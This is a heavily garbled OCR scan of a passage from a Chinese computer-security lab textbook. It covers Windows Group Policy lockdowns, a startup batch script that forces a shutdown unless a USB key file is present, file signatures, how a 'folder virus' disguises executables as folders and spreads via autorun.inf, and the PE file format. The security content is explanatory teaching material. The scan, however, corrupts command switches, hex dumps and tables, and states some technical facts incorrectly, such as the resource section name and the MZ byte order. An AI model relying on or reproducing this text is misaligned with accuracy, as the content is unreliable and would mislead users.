开 ?菜单 项 ?策略 ,用户 在 浏览 器 中 右 击 链接 ,选择 “在 新 窗口 中 打开 ”时 ,该 命令 不 起 作用 。 
网 页 自动 打开 的 窗口 也 被 禁止 ,可 达到 屏蔽 弹出 广告 窗口 的 效果 。 

© 禁用 “Internet 选项 ”控制 面板 : 如 果 不 希 望 用 户 修改 Internet Explorer 的 属性 中 的 
某 些 设置 ,可 以 禁用 "Internet 选项 ”的 某 些 选项 卡 ,在 “Internet 控制 面板 ”目录 中 ,启用 “ 禁 
用 常规 页 "“ 禁 用 安全 页 ”等 组 策略 项 ,可 在 “Internet 选项 ”中 删除 “常规 ”" “安全 ”等 选 
项 卡 。 

© 禁止 修改 下 浏览 器 的 主页 :在 “工具 栏 " 目 录 , 启 用 “禁用 更 改 主页 设置 "策略 即 可 。 

@ 自 定义 正 工 具 栏 : 在 “组 策略 ”控制 台中 ,展开 “用 户 配置 "一 “Windows 设置 ”一 
“Internet Explorer 维护 ”>“ 浏 览 器 用 户 界面 "项 ,双击 “浏览 器 工具 栏 按钮 自 定 义 " 策 略 , 打 
开 其 设置 窗口 中 ,在 “按钮 ” 栏 中 单 击 “ 添 加 ”按钮 .在 “工具 栏 标 题 ”* 中 输入 “我 的 QQ”. fE“ T. 
具 栏 操作 ”中 选择 QQ 程序 的 路 径 , 最 后 再 选择 好 “颜色 图 标 ”" 和 “ 灰 度 图 标 ” 的 路 径 。 添 加 了 
一 个 “我 的 QQ” 按 钮 。 

(6) 实现 Windows 高 级 功能 。 

O 关闭 缩 略图 的 缓存 : 在 “组 策略 编辑 器 ”中 ,展开 “用 户 配 置 "* 一 “管理 模板 ”一 
“Windows 组 件 ”>“Windows 资源 管理 器 ”项 ,启用 “关闭 缩 略 图 的 缓存 "策略 即 可 。 

@ 隐藏 "我 的 电脑 ”中 指定 的 驱动 器 :“ 用 户 配置 ?一 “管理 模板 ?一 “Windows 组 件 ” 一 
“Windows 资源 管理 器 ”项 .启用 “隐藏 “我 的 电脑 ' 中 的 这 些 指定 的 驱动 器 "策略 ,并 在 列表 
框 中 选择 一 个 驱动 器 或 几 个 驱动 器 。 

© 防止 从 “我 的 电脑 ”访问 驱动 器 : 在 “组 策略 编辑 器 ”中 ,展开 “用 户 配 置 "*>“ 管 理 模 
板 ”>“Windows 组 件 ”“Windows 资源 管理 器 ”项 ,启用 “防止 从 “我 的 电脑 "访问 驱动 器 ” 
策略 ,并 在 列表 框 中 选择 一 个 驱动 器 或 几 个 驱动 器 。 


© 禁止 使 用 命令 提示 符 : 在 “组 策略 编辑 器 "中, 展开“ 用户 配置 ">“ 管 理 模 板 ”>“ 系 
统 " 项 ,启用 “阻止 访问 命令 提示 符 " 策 略 , 并 选择 “也 停 用 命令 提示 符 脚 本 处 理 ” 项 。 

© 禁止 更 改 显 示 属 性 : 在 “组 策略 编辑 器 "中, 展开“ 用户 配置 ">“ 管 理 模 板 ”>“ 控 制 
面板 ”>“ 显 示 ” 项 ,可 根据 需要 启用 “隐藏 桌面 选项 卡 ”“ 隐 藏 主题 选项 卡 "“ 隐 藏 保护 程序 
选项 卡 "“ 隐 藏 设置 选项 卡 "等 策略 ,来 隐藏 相关 属性 的 选项 卡 ,用 户 将 无 法 再 对 桌面 属性 进 
行 更 改 。 

© 禁用 注册 表 编 辑 器 : 在 “组 策略 编辑 器 ”中 ,展开 “用 户 配 置 ”>“ 管 理 模板 ”>“ 系 统 ” 
项 ,启用 “阻止 访问 注册 表 编辑 工具 "策略 ,禁止 用 户 启动 注册 表 编 辑 器 。 

© 禁止 访问 控制 面板 : 在 “组 策略 编辑 器 ”中 ,展开 “用 户 配置 ">“ 管 理 模板 ”>“ 扩 展 
面板 "项 ,启用 “禁止 访问 控制 面板 "策略 。 此 后 用 户 不 能 使 用 Control. exe 启动 控制 面板 ， 
“开始 "菜单 和 资源 管理 器 中 将 删除 “控制 面板 "项 。 

@ 禁用 添加 /删除 程序 : 在 “组 策略 编辑 器 ”中 ,展开 “用 户 配 置 ">“ 管 理 模板 ”一 “添加 
或 删除 程序 ”项 ,启用 “删除 “添加 /删除 程序 "策略, 用户 将 无 法 运行 “添加 /删除 程序 ”。 

© 限制 使 用 应 用 程序 : 展开 “系统 ”项 ,启用 “只 运行 许可 的 Windows 应 用 程序 ”策略 ， 
添加 允许 运行 的 应 用 程序 。 

O 隐藏 在 控制 面板 中 指定 的 图 标 : 展开 “控制 面板 "项 ,启用 “隐藏 指定 的 控制 面板 程 
序 ” 策 略 , 添 加 相应 的 图 标 。 

QD 禁用 Ctrl 十 Alt 十 Del 快捷 键 : 展开 * 系 统 ” 一 Ctrl 十 Alt 十 Del 项 ,启用 相应 的 策略 ,如 
“删除 “任务 管理 器 *”。 

O 删除 开始 菜单 中 的 “关机 ”图 标 : 展开 “任务 栏 和 "开始 ,菜单 ”项 ,启用 “删除 和 阻止 
访问 “关机 "命令 "策略 。 

O 隐藏 桌面 上 所 有 图 标 : 展开 “桌面 "项 ,启用 “隐藏 和 禁用 桌面 上 所 有 的 项 目 ” 策 略 。 

(7) 账户 策略 。 

D 密码 策略 的 设置 : 在 “组 策略 编辑 器 ”中 ,展开 “计算 机 配置 ”>“Windows 设置 ”一 
“安全 设置 ”>“ 账 户 策略 ”一 “密码 策略 ”, 强 制 密码 历史 、 密 码 最 长 使 用 期 限 、 密 码 最 短 使 用 
期 限 、 密 码 长 度 最 小 值 。 

O 账户 锁定 策略 : 在 “组 策略 编辑 器 ”中 ,展开 “计算 机 配置 ”>“Windows 设置 ”一 “ 安 
全 设置 ”一 “账户 策略 >“ 账户 锁定 策略 ”项 ,为 保护 账户 安全 而 将 此 账户 进行 锁定 ,使 之 在 
一 定时 间 内 不 能 再 次 登录 ,从 而 挫败 连续 的 猜 解 尝试 。 

© 用 户 权限 指派 : 在 “组 策略 编辑 器 ”中 ,展开 “计算 机 配置 "一 “Windows 设置 ”>“ 安 
全 设置 ">“ 本 地 策略 >“ 用 户 权 限 指派 ”。 

名 从 网 络 访问 此 计算 机 : 确定 哪些 用 户 和 组 能 够 通过 网 络 连接 到 该 计算 机 。 许 多 网 络 
协议 (如 HTTP) 都 要 求 该 用 户 权 利 。 默 认 情 况 下 为 Everyone( 任 何人 ) 安 全 组 授予 
权限 。 建 议 删除 Everyone 组 。 

名 装载 和 印 载 设备 驱 动 程序 : 确定 哪些 用 户 有 权 安 装 和 外 载 设备 驱动 程序 。 默 认 情况 
下 Print Operators 组 有 此 权限 。 建 议 此 权限 只 授予 Administrators 组 。 

芯 还 原文 件 及 目录 : 允许 用 户 在 恢复 备份 的 文件 或 文件 夹 时 , 避 开 文件 和 目录 的 许可 
权限 ,并 且 作 为 对 象 的 所 有 者 设置 任何 有 效 的 安全 主体 。 建议 此 权限 只 授予 


Administrators 组 。 


实践 教程 


(8) 启动 /关机 登录/ 注销 脚本 。 

启动 脚本 是 用 户 登 录 之 前 运行 的 批文 件 , 关 机 脚本 是 计算 机 关机 之 前 运行 的 批文 件 , 肢 
本 程序 只 运行 一 次 。 登 录 / 注 销 脚本 : 在 用 户 登 录 对 话 框 出 现 后 ,用 户 登录 系统 或 从 系统 注 
销 时 运行 ,每 次 登录 /注销 时 都 运行 一 次 。 

利用 启动 脚本 制作 Windows 系统 开机 的 加 密 狗 。 所 谓 的 开机 加 密 狗 是 为 了 避免 他 人 
随便 开启 自己 的 计算 机 查看 私密 信息 。U 盘 加 密 狗 是 让 计算 机 只 有 在 插入 特定 的 U 盘 后 
才能 启动 ,否则 启动 后 即 自动 关机 。 具 体 步骤 如 下 。 

O E U 盘 或 者 其 他 移动 存储 设备 。 

© 在 口 盘 根 目录 下 创建 一 个 任意 类 型 的 文件 如 文本 文件 , 取 名 为 “加 密 . txt”。 

@ 在 计算 机 上 任意 位 置 新 建 一 个 文本 文件 ,假设 U 盘 的 驱动 器 盘 符 为 ], 在 这 个 文本 
文件 中 输入 如 下 内 容 : 


if not exist J: 加 密 .txt shutdown -s -t10 -c "你 无 法 使 用 该 计算 机 " 


这 句 话 的 意思 是 如 果 U 盘 中 不 存在 “加 密 . txt” 这 个 文件 , 则 在 10 秒 后 关闭 该 计算 机 ， 
并 显示 “你 无 法 使 用 该 计算 机 ”提示 信息 ,其 中 shutdown 是 cmd 命令 ,其 参数 解释 如 表 4-2 
所 示 。 
表 4-2 shutdown 参数 说 明 

=i 显示 GUI 界面 ,必须 是 第 一 个 选项 

a, 注销 (不 能 与 选项 一 m” 一 起 使 用 ) 

=j 关闭 此 计算 机 

= 关闭 并 重启 动 此 计算 机 

= 放弃 系统 关机 

一 m \\computername 远程 计算 机 关机 /重启 动 /放弃 

= 设置 关闭 的 超时 为 xx 秒 

一 c "comment" 关闭 注释 (最 大 127 个 字符 ) 

=p 强制 运行 的 应 用 程序 关闭 而 没有 警告 

一 4 [由 [p]:xx:yy 关闭 原因 代码 
u 是 用 户 代码 
p 是 一 个 计划 的 关闭 代码 
xx 是 一 个 主要 原因 代码 (小 于 256 的 正 整数 ) 
yy 是 一 个 次 要 原因 代码 (小 于 65536 的 正 整 数 ) 


输入 完成 后 ,修改 文件 扩展 名 为 “. bat”, 取 名 为 “test. bat”, 

@ 打开 组 策略 编辑 器 ,展开 “计算 机 配置 ">“Windows 设置 ”~“* 脚 本 (启动 /关机 )”, 然 
后 在 右边 的 框 中 双击 “启动 ”项 ,并 将 刚才 建立 的 批 处 理 文件 添加 到 启动 脚本 列表 中 , 单 击 
“确定 ”并 退出 就 可 以 了 ,如 图 4-13 所 示 。 

在 开机 时 插入 U 盘 才 能 启动 计算 机 并 进入 系统 ,否则 将 出 现 提示 并 在 指定 时 间 内 关闭 
计算 机 。 值 得 注意 的 是 开机 前 就 插 上 U 盘 , 有 可 能 造成 部 分 计算 机 无 法 正常 启动 的 情况 ， 
则 需要 在 显示 出 Windows 的 启动 画面 后 再 插入 制作 的 加 密 狗 。U 盘 遗 失 情 况 下 的 解决 办 
法 如 下 。 


图 局 动 脚本 本 地 计算 机 的 ) 


图 4-13 “启动 属性 ”对 话 框 


O 如 果 时 间 足 够 多 ,可 以 在 运行 中 输入 “shutdown -a” 来 解除 关机 指令 。 

© 备份 U 盘 中 的 文件 到 其 他 地 方 , 当 U 盘 丢 失 时 将 加密. txt" 文 件 复制 到 新 U 盘 。 

© 将 计算 机 启动 到 安全 模式 下 将 启动 脚本 删除 ,因为 在 安全 模式 下 是 不 会 加 载 开机 上肢 
本 的 。 


6. 思考 题 
分 析 注 册 表 和 组 策略 之 间 的 区 别 和 联系 。 


文件 类 型 


1. 实践 目的 
理解 文件 格式 ,掌握 文件 查看 方式 。 
2. 实践 环境 


(1) P£ À Internet 的 计算 机 一 台 , 安 装 Windows XP, Windows 7 或 
Windows 8 等 操作 系统 。 

(2) 实践 工具 : Winhex. exe, Restorator 2007, 文 件 属性 时 间 修 
改 器 。 


3. 名 词 解释 


(1) 文件 系统 : 操作 系统 用 于 明确 磁盘 或 分 区 上 的 文件 的 方法 和 数 
据 结构 , 即 在 磁盘 上 组 织 文件 的 方法 。 

(2) 文件 类 型 : 即 文件 格式 ,是 指 计算 机 为 了 存储 信息 而 使 用 的 对 
信息 的 特殊 编码 方式 ,是 用 于 识别 内 部 存储 的 资料 。 

(3) 文件 属性 : 包括 文件 类 型 .长度 .位 置 、. 存 储 类 别 、 建 立时 间 、 访 
问 时 间 等 ,通过 attrib 命令 修改 文件 的 只 读 属 性 .存档 属性 .系统 属性 、 隐 
藏 属性 等 。 

(4) 文件 扩展 名 : 是 操作 系统 用 来 标志 文件 格式 的 一 种 机 制 。 通 常 
来 说 ,一 个 扩展 名 是 跟 在 主 文件 名 后 面 的 ,由 一 个 分 隔 符 分 隔 。 

(5) 文件 图 标 : 图 标 是 文件 的 形象 化 标识 ,系统 会 依据 已 知 文件 的 
扩展 名 ,赋予 不 同类 型 文件 不 同 的 形象 化 图 标 , 也 就 是 说 图 标 随 扩展 名 
的 变化 而 改变 。 扩 展 名 和 图 标的 对 应 关系 存储 在 注册 表 中 。 

(6) WJ BUT X#E; Windows 操作 系统 中 的 二 进 制 可 执行 文件 
(executable file) 具 有 “单独 运行 "“ 有 生命 ”的 特性 。 可 执行 文件 是 可 移 
植 可 执行 (PE) 文 件 格式 的 文件 , 它 可 以 加 载 到 内 存 中 ,并 由 操作 系统 加 
载 程序 执行 。 主 要 包括 : *. exe, 即 单独 执行 文件 (. COM 文件 ); 
x. dll, 即 动态 链接 库 ,程序 模块 ; * . sys, 即 内 核 驱 动 文件 。 

(7) 文件 关联 : 将 一 种 类 型 的 文件 与 一 个 可 以 打开 它 的 程序 建立 起 
一 种 依存 关系 。 如 位 图 文件 (BMP 文件 ) 在 Windows 中 的 默认 关联 程序 


是 “画图 程序。 默认 关联 可 以 修改 。 
4. 预备 知识 


1) 文件 系统 

操作 系统 中 负责 管理 和 存储 文件 信息 的 软件 机 构 称 为 文件 管理 系统 ,简称 文件 系统 。 
文件 系统 由 三 部 分 组 成 : 与 文件 管理 有 关 的 软件 ,被 管理 文件 ,以 及 实施 文件 管理 所 需 的 数 
据 结构 。 从 系统 角度 来 看 ,文件 系统 是 对 文件 存储 器 空间 进行 组 织 和 分 配 ,负责 文件 存储 并 
对 存 人 的 文件 进行 保护 和 检索 的 系统 。 具 体 地 说 , 它 负 责 为 用 户 建立 文件 , 存 人 、 读 出 、 修 
改 、 转 储 文件 ,控制 文件 的 存 取 , 当 用 户 不 再 使 用 时 撤销 文件 等 。 

基于 MS-DOS,Windows 95 等 系统 都 采用 了 FAT16 文件 系统 。 在 Windows 9X 下 ， 
FAT16 支持 的 分 区 最 大 为 2GB, 存 储 效率 较 低 。 随 着 计算 机 硬件 和 应 用 的 不 断 提高 ,推出 
了 增强 的 文件 系统 FAT32。FAT32 最 大 的 优点 是 可 以 支持 的 磁盘 大 小 达到 32GB, 但 是 不 
能 支持 小 于 512MB 的 分 区 。 

NTFS 文件 系统 是 一 个 基于 安全 性 的 文件 系统 ,是 Windows NT 所 采用 的 独特 的 文件 
系统 结构 , 它 是 建立 在 保护 文件 和 目录 数据 基础 上 ,同时 照顾 节省 存储 资源 ,减少 磁盘 占用 
量 的 一 种 先进 的 文件 系统 ,支持 的 磁盘 大 小 达到 2TB, 可 以 更 有 效率 地 管理 磁盘 空间 。 
Ext2 和 Ext3 是 GNU/Linux 系统 中 标准 的 文件 系统 。 

2) 文件 类 型 

对 于 硬盘 机 或 任何 计算 机 存储 来 说 ,有 效 的 信息 只 有 0 和 1 两 种 , 即 任何 一 个 存储 在 计 
算 机 上 的 文件 都 可 以 认为 是 由 最 基本 的 0 和 1 组 成 的 。 有 些 文件 格式 被 设计 用 于 存储 特殊 
的 数据 ,例如 : 图 像 文 件 中 的 JPEG 文件 格式 仅 用 于 存储 静态 的 图 像 ,而 GIF 既 可 以 存储 静 
态 图 像 , 也 可 以 存储 简单 动画 ; PDF 格式 则 可 以 存储 内 容 丰富 的 ,图 文 并 茂 的 文本 。 

同一 个 文件 格式 ,用 不 同 的 程序 处 理 可 能 产生 截然 不 同 的 结果 。 例 如 Word 文件 ,用 
Microsoft Word 观看 的 时 候 , 可 以 看 到 文本 的 内 容 , 而 以 无 格式 方式 在 音乐 播放 软件 中 播 
放 , 产 生 的 则 是 噪声 。 一 种 文件 格式 对 某 些 软件 会 产生 有 意义 的 结果 ,对 另 一 些 软件 来 说 ， 
就 像 是 毫 无 用 途 的 数字 垃圾 。 

操作 系统 一 般 以 文件 扩展 名 来 识别 对 应 的 文件 类 型 ,启动 对 应 的 应 用 程序 ,如 果 更 改 文 
件 扩展 名 会 导致 系统 误 判 文件 格式 而 打开 失败 ,参见 HKEY_CLASSES_ROOT 的 实践 。 

WinHex. exe 工具 以 0 和 1 数据 流 方式 .能 打开 所 有 类 型 的 文件 ,以 数据 流 或 元 数据 的 
形式 显示 文件 内 容 , 如 图 5-1 所 示 。 

WinHex 显示 的 时 候 是 十 六 进 制 , 一 位 十 六 进 制 相当 于 4 位 二 进 制 ,两 位 十 六 进 制 相当 
于 8 位 二 进 制 即 一 个 字 节 ,每 个 字 节 即 对 应 一 个 地 址 。offset 一 列 是 行 标 ,0~F 一 行 是 列 
标 , 行 标 和 列 标 便 组 成 了 地 址 。 如 6BFA3003 这 个 地 址 ,其 行 标 便 是 6BFA3000, 列 标 为 3。 
图 5-1(a) 所 示 为 exe 文件 的 数据 流 ,开始 处 的 两 个 字 节 MZ(4D 5A) 即 是 . exe 文件 特征 签名 
( 幻 数 : magic number)。 图 5-1(b) 所 示 为 GIF 文件 的 数据 流 ,开始 处 的 6 个 字 节 GIF89a 
(474946383961) 即 是 GIF 文件 特征 签名 ,文件 特征 签名 不 随 文件 扩展 名 的 改变 而 改变 ,应 
用 程序 往往 利用 特征 签名 来 判断 文件 是 否 完整 和 有 效 , 例 如 人 为 地 将 txt 文件 改 为 exe 文 
件 , 系 统 报 “ 不 是 有 效 的 程序 ”的 错误 。 

如 果 软 件 打开 或 读 取 已 存在 的 文件 .系统 会 自动 修改 文件 的 访问 时 间 , 安 全 软件 或 还 原 


实践 教程 


软件 通常 依据 建立 时 间 和 访问 时 间 来 进行 痕迹 追踪 。 利 用 工具 “文件 属性 时 间 修 改 器 ”修改 
文件 的 各 个 属性 ,如 图 5-2 所 示 。 


EE 文件 (E) MED 搜索 (5) 位 置 (E) WAW IAD 专家 (ID HAO SOW MDW 
口 芒 旧 局 加 和 访 | — LALY ALUKA | 一 下 二 二 Iomlan) 


Offset 
00000000 
00000016 
00000032 
00000048 ea 
00000064 让 EtiTa 
00000080 is program canno 
00000096 t be run in DOS 
00000112 mode 和- 
00000128 I»ólłeÚlÍeúlÍeúiÍ 
2007-06-01 | 00000144 hOTTIE5AT DIL 
000000| 00000160 -teórii :OAtdvnt 
2007-06-01 | 00000176 !DAIcUII! 01a 
000000| 00000192 RicheÚ1Í....... 


nnnnnzng 人 
s, 一 一- 一 -一 一 一 一 一 


SWinHex - [8f951013. gif] 
SRD HAO SOW HMW 
ñ Datt ƏSsomp AAD O 


5951013 gi E 


Offset | 0 1 2 3 4 5 6 7 9 À 
00000000 46 38 39 61 1B 01 00 F7 
00000010 FC F7 F8 F7 E8 FO EE DA FO FF DD iyü+e-éóe@&61Ú8y+ 

137KB| 00000020 D6 E6 FF D8 E4 F9 DO DF DD C9 inOmyOmi IaiDBYEP 
140,216bnes| 00000030 D5 D8 B8 D4 64 CC cc cc CB cE 50 .06e0diiiEix 


B D E E. 
0 


00 FF FF FF RIF890..Ñ.-..yyy Ñ 


8951013 gif 
EA 0 


Flle size: 


00000040 B4 BD CE CD B5 CE CC C6 CS B4 BS ËÍ' MÍÍ “pOutiaA y 
originai] 00000050 B6 C5 BD AD C2 B1 AD C4 CB EO CO | AÇTAn-A»At-ÄËAÀ 


Default Edit Mode 

State: 

nnnnnnén Al ra rn An Ra ns Añ. E 
sssi z ee f 


Undo level: 
Page 1 of 1252 3 na, 


(b) 
图 5-1 文件 数据 流 显示 


rai r *& 


建立 关联 BAXE x+ ED 
图 5-2 文件 属性 时 间 修改 器 


Windows 操作 系统 的 文件 图 标 是 根据 文件 扩展 名 读 取 的 , 读 取 . txt 扩展 名 的 文件 图 标 
和 类 型 描述 信息 步骤 如 下 。 


(1) .txt 扩展 名 的 文件 图 标 ,通过 注册 表 项 HKCR/. txt 找到 该 类 型 为 txtfile。 

(2) 通过 HKCR/txtfile 得 到 它 的 描述 信息 是 “文本 文档 ”( 也 可 能 会 显示 为 Text 
Document) 。 

(3) 通过 HKCRVtxtfile/DefaultIcon 得 到 该 类 型 的 默认 图 标的 文件 和 图 标 索引 信息 。 

ERU = % SystemRoot %\system32\shell32. dll ,一 152 。 

. txt 的 文件 默认 图 标 在 shell32. dll, 31% 152. 

(4) 利用 系统 API 函数 ExtractIconExW 将 图 标 提取 出 来 。 

利用 Restorator 2007 工具 可 以 查看 和 编辑 已 编译 EXE 程序 文件 的 资源 , 即 Restorator 
是 一 个 与 应 用 程序 的 Windows 资源 及 应 用 程序 构成 打交道 的 工具 (PE 文件 及 RES 文件 ) 。 
Restorator 可 以 更 新 ,增加 和 删除 如 文本 、 图 像 、 图 标 、 声 音 、 视 频 、 版 本 号 、 对 话 框 及 菜单 等 
的 任何 应 用 程序 中 的 资源 。 将 shell32. dll #& À. Restorator 2007 工具 ,展开 界面 右 侧 资源 树 
中 的 图 标 ,查看 索引 为 152 的 图 标 ,如 图 5-3 所 示 。 


Da amaa BP [D @ sassa. H @ Em + $ @ — Ë 
Fiii 


| 


| mae 
Bu ` 


ge 16x16 R, 4 位 色彩 R3510 


DE bxt8 BR, 8 位 色彩 ”索引 -sl 


图 标 32x32 像素 ，8 位 色彩 索引 =512 


路 16=16 @R. 8 位 色彩 索引 =513 


图 5-3 Restorator 显示 shell32. dll 资源 


3) 文件 夹 病毒 

Restorator 2007 工具 可 以 修改 任何 应 用 程序 中 的 显示 图 标 , 且 不 影响 程序 的 运行 ,也 
就 是 说 文件 的 图 标 与 文件 的 扩展 名 并 不 需要 一 一 对 应 。 基 于 此 ,文件 夹 病毒 的 图 标 伪装 为 
文件 夹 图 标 , 使 其 看 起 来 像 一 个 文件 夹 , 欺 骗 用 户 双 击 运 行 ,因此 很 具有 迷惑 性 ,如 图 5-4 
所 示 。 

图 5-4 中 上 部 显示 原 正常 的 文件 夹 被 隐藏 ,而 下 部 是 建立 的 同名 exe 文件 夹 ( 扩 展 名 
.exe 隐藏 了 ) , 当 单 /双击 这 些 假冒 的 文件 夹 时 ,就 会 先 激活 病毒 ,然后 打开 正常 文件 夹 , 表 
面 上 一 切 正常 。 

该 病毒 主要 通过 U 盘 来 传播 。 当 被 感染 的 计算 机 接 和 人 U 盘 后 ,病毒 会 遍历 移动 磁盘 根 
目录 下 的 文件 夹 ,衍生 自身 到 移动 磁盘 根 目录 下 ,更 名 为 检测 到 的 文件 夹 名称 , 修 改 原文 件 
夹 属性 为 “隐藏 ", 同时 建立 同名 的 exe 文件 夹 ,并 建立 autorun. inf 自动 播放 文件 和 
Recycled. exe 的 病毒 文件 ,使 用 户 在 其 他 未 感染 的 计算 机 中 使 用 移动 磁盘 打开 其 文件 夹 时 
运行 病毒 ,以 达到 病毒 随 移动 磁盘 传播 的 目的 。 


2013-38 16:10 
2013-3-8 16:10 
2013-3-8 16:10 
2013-3-8 16:10 
局 Tertcov 2013-3-8 16:10 
已 rieait WASISEME KIHE 2013-3-8 16:10 
Bovex 


2013-3-8 16:10 


RE Yeb Folders 2013-3-8 16:10 
局 veb server extensions 2011-8-11 16:14 

Tonmon Files 

Raset 107 B 2013-3-8 10:53 

共享 文档 SInfo 107 KB 2013-3-8 10:53 

Enem Speech 107 a 2013-3-8 10:53 


2013-3-8 10:53 
2013-3-8 10:53 


Stationery 107 
F56Je FREE 
kaa 统 文件 夫 相同 文件 名 me 


2013-3-8 10:53 
upo ”的 文件 去 病 毒 程序 sim 2013-3-8 16:11 
Dvex 107 KB 2013-3-8 10:53 


Yeb Folders 107 KB 2013-3-8 10:53 
Dweb server extensions 107 KB 2013-3-8 10:53 


图 5-4 文件 夹 病毒 


该 类 病毒 的 变种 很 多 ,其 中 一 种 病毒 被 激活 后 ,会 将 自身 复制 到 如 图 5-5 所 示 的 目录 
下 ,并 改名 为 svchost, exe, 同 时 修改 注册 表 的 自 启动 项 和 其 他 表 项 ,达到 病毒 随 系统 启动 而 
自 启动 的 目的 。 


| 暂 不 处 理 立即 处 理 


本 次 扫描 发 现 17 个 符 处 理 项 ! 
9 加 果 您 公司 开发 的 软件 被 误 报 ， 请 联系 SNEAD» 及 时 去 除 误 报 。 


| D:\ 我 的 文档 .exe 
| E ASRECYCLE. BIN. exe 
了 :ARECYCLER exe 
|| E:\System Volume Information. exe 


|| “C:\Program Files\Windows Media PlayerVTdNSVc\1VOVTAT\2V6VeV3\W5\V6VT\2V6V4AVbVeVTADO\V2VcV3vdAT\V9VTVE\fvavautorun inf\svchost. exe 


图 5-5 文件 夹 病毒 的 目录 


图 5-5 所 示 的 病毒 存放 目录 被 故意 设置 得 很 深 , 使 手工 排查 很 困难 。 一 般 来 说 ,在 双击 
exe 文件 夹 之 前 一 般 不 会 感染 到 本 地 计算 机 。 系 统 默认 隐藏 已 知 文件 的 扩展 名 ,这 可 能 引 
发 诸如 文件 夹 病毒 安全 问题 ,通过 文件 夹 选项 里 的 “查看 ”选项 来 显示 . 勾 选 “显示 所 有 文件 
和 文件 夹 " 的 同时 还 需 去 掉 “ 隐 藏 受 保护 的 操作 系统 文件 ”选项 ,如 图 5-6(a) 所 示 , 则 对 应 的 
扩展 名 显示 出 来 ,如 图 5-6(b) 所 示 。 

文件 夹 病毒 通常 会 不 断 地 循环 修改 注册 表 键 值 来 隐藏 “文件 夹 选项 "菜单 ,这 也 是 计算 
机 变 慢 的 原因 ,在 高 级 篇 中 将 介绍 它 的 原理 。 恢 复方 法 如 下 。 

(1) 组 策略 : 展开 “用 户 设置 ">“ 管 理 模 板 ”>“Windows 组 件 ”>“Windows 资源 管理 
器 ”, 双 击 右 侧 的 “从 工具 菜单 中 删除 文件 夹 选 项 "菜单 ,随后 在 弹出 的 对 话 框 中 选择 “已 启 
用 ”选项 则 可 以 隐藏 文件 夹 选 项 ,如 果 选 择 “ 未 配置 "或 “已 禁用 ”, 则 可 以 显示 文件 夹 选项 。 


文件 夫 选 项 


常规 


munam: 
O 作为 单一 文件 显示 和 管理 对 

记 住 每 个 文件 的 视图 设置 

O 合用 商 音 文件 共享 (推荐) 

慑 标 指向 六 件 兴 各 面 项 时 旺 示 提示 信息 
E] 显示 系统 文件 天 的 内 容 


@ 显示 所 有 文件 和 文件 灾 
O mmEanz patanpi RE 
REERITMEREMN MPS 文件 a a 

My Music. exe 
F TY) 


= | Q e= 


(b) 
图 5-6 文件 夹 选项 


部 分 Windows 7 操作 系统 默认 安装 时 “工具 ”菜单 中 没有 “文件 夹 选项 ” 子 菜单 。 

(2) 注册 表 : HKEY_CURRENT_USER\Software\ Microsoft\ Windows\CurrentVersion\ 
Policies\Explorer, 在 Explorer 主键 下 的 右 窗口 将 NoFolderOptions( 键 值 类 型 为 二 进 制 ) 删 
除 或 将 键 值 “01 00 00 00” 修 改 为 “00 00 00 00”, 系 统 重启 后 “文件 夹 选项 ”菜单 重 现 。 

HKEY-CURRENT-USER \ software\ microsoft \ windows \ currentversion \ policies\ 
explorer 分 支 ,在 右 侧 窗口 中 找到 nofilemenu 键 .将 键 值 修改 为 “0”, 或 者 删除 该 键 。 

也 可 能 禁用 了 组 策略 和 注册 表 编 辑 器 ,那么 重启 计算 机 进入 “安全 模式 ”进行 修改 。 

4) 可 执行 文件 

Windows 操作 系统 中 的 可 执行 文件 (executable file) 是 PE 文件 格式 的 文件 , 它 可 以 加 
载 到 内 存 中 ,并 由 操作 系统 加 载 程序 执行 。 文 件 标志 : 5A 4D (M2). 

Windows 系统 下 可 执行 文件 扩展 名 主要 为 . exe、. dll、. sys 这 三 种 。 

(1) * .exe: 单独 执行 文件 (. COM 文件 ) 。 

Q) * .dll: 动态 链接 库 ,程序 模块 。 

(3) * .sys: 内核 驱动 文件 。 

它们 的 文件 结构 一 致 ,统一 称 为 PE 文件 ,如 图 5-7 所 示 。 程 序 中 的 不 同 部 分 分 成 各 种 
节 区 (Section) ,DOS MZ header 和 部 分 PE header 的 大 小 是 不 变 的 .DOS stub 部 分 的 大 小 
是 可 变 的 。 一 个 PE 文件 至 少 需要 两 个 Section ,一 个 存放 代码 , 另 一 个 存放 数据 。 NT 上 的 
PE 文件 基本 上 有 9 个 预定 义 的 Section ,分 别 为 . text、. bss、. rdata、. data、. rsrc、. edata、 
.idata、. pdata 和 . debug。 一 些 PE 文件 中 只 需要 其 中 的 一 部 分 Section, 以 下 是 通常 的 
分 类 。 

A) 执行 代码 Section ,通常 命名 为 . text (MS). 

(2) 数据 Section ,通常 命名 为 . data.. rdata 或 . bss( MS) 。 


实践 教程 


Offset 0 1 2 3 4561 7 68689ABcCDErF 
00000000 | 4D SA 90 00 03 00 00 00 
00000010 B8 00 00 OO 00 00 00 00 
00000020 OO 00 00 00 00 00 00 00 
00000030 | 00 00 OO 00 OO OO OO DD 
00000040 OE 1F BA OE 00 B4 09 CD 
00000050 69 73 20 70 72 6F 67 72 
00000060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20|t be run in DOS 
00000070 6D 6F B4 65 2E OD OD OA 24 00 00 00 00 00 00 00 mole....$....... 
00000080 EC 85 5B A1 A8 E4 35 F2 AB E4 35 F2 A8 E4 35 F2 | il[i"ä5ò"ä5ò"ä5ò 
00000090 6B EB 3A F2 A9 E4 35 F2 6B EB 55 F2 A9 E4 35 F2 | kg;o8a5oksUo8a5o 
000000A0 6B EB 68 F2 BB E4 35 F2 AB E4 34 F2 63 E4 35 F2 | këhò»ä5ò"ä4òcä5ò 
00000080 6B EB 6B F2 A9 E4 35 F2 6B EB 6A F2 BF E4 35 F2 | këkò@äSòkëjòċä5ò 
000000C0 6B EB 6F F2 A9 E4 35 F2 52 69 63 68 A8 E4 35 F2 | ksobes5oRich 'á5ó 
000000D0 00 00 00 00 00 00 00 DD Tiie pg 
000000E0 50 45 00 00 4C 01 03 00 
000000F0 |00 00 00 00 EO 00 OF 01 


5-7 PE 文件 格式 


(3) 资源 Section, 通 常 命名 为 . edata。 
(4) 输入 数据 Section, 通 常 命 名 为 . idata。 
(5) 调试 信息 Section, 通 常 命名 为 . debug。 


资源 节 区 (Section) 用 于 放置 各 种 资源 ,如 菜单 、 对 话 框 、 位 图 、 光 标 、 图 标 和 声音 等 , 资 
源 是 Win32 可 执行 文件 的 标准 组 成 部 分 ,而 且 是 非常 重要 的 组 成 部 分 , 它 的 格式 是 固 


定 的 。 


